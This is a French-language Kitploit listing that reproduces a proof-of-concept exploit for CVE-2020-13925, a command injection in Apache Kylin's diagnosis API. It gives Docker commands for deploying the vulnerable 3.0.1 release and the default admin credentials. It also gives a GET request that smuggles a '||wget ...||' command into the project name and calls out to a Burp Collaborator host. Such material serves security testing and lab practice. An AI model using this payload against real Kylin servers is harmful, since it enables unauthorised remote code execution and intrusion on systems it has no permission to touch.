Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2020-13925 — Exploit de preuve de concept pour CVE-2020-13925, une vulnérabilité d'injection de commande dans l'API de diagnostic d'Apache Kylin, permettant l'exécution de code à distance via des noms de projet spécialement conçus. | Kitploit
Outils/GitHubGitHub/bit4woo/cve-2020-13925
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubbit4woo/cve-2020-13925

CVE-2020-13925

Exploit de preuve de concept pour CVE-2020-13925, une vulnérabilité d'injection de commande dans l'API de diagnostic d'Apache Kylin, permettant l'exécution de code à distance via des noms de projet spécialement conçus.

Voir le dépôt
16163il y a 6 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2020-13925

Mise en place de l'environnement

Référence : https://github.com/apache/kylin

Déployez l'environnement avec Docker en utilisant la version 3.0.1 (version vulnérable). Vous pouvez supprimer -m 8G \ (qui sert à allouer la mémoire).

Ensuite, accédez à http://host:7070/kylin/login. Le nom d'utilisateur et le mot de passe par défaut sont ADMIN/KYLIN.

root@kitploit:~
docker pull apachekylin/apache-kylin-standalone:3.0.1

docker run -d \
    -m 8G \
    -p 7070:7070 \
    -p 8088:8088 \
    -p 50070:50070 \
    -p 8032:8032 \
    -p 8042:8042 \
    -p 16010:16010 \
    apachekylin/apache-kylin-standalone:3.0.1
    
docker run -d \
    -p 7070:7070 \
    -p 8088:8088 \
    -p 50070:50070 \
    -p 8032:8032 \
    -p 8042:8042 \
    -p 16010:16010 \
    apachekylin/apache-kylin-standalone:3.0.1

Preuve de concept (PoC) de la vulnérabilité

root@kitploit:~
Requête originale :
http://host:port/kylin/api/diag/project/learn_kylin/download

Requête PoC, méthode GET :
http://host:port/kylin/api/diag/project/%7c%7cwget%20h1j96qoac5o9mbqpkewkhxxa218rwg.burpcollaborator.net%7c%7c/download

Il suffit de remplacer le nom du projet "learn_kylin" par la charge utile suivante :
||wget h1j96qoac5o9mbqpkewkhxxa218rwg.burpcollaborator.net||

Étapes de reproduction

Accédez à System → Configuration → Diagnosis. Déclenchez la requête de téléchargement des informations de diagnostic : http://host:port/kylin/api/diag/project/learn_kylin/download

image.png

Remplacez le nom du projet "learn_kylin" par la charge utile ci-dessus, puis accédez-y.

image.png

Liens de référence

https://mp.weixin.qq.com/s/LdEgENX2_b8tb12n4H9KJQ

Télécharger l’outil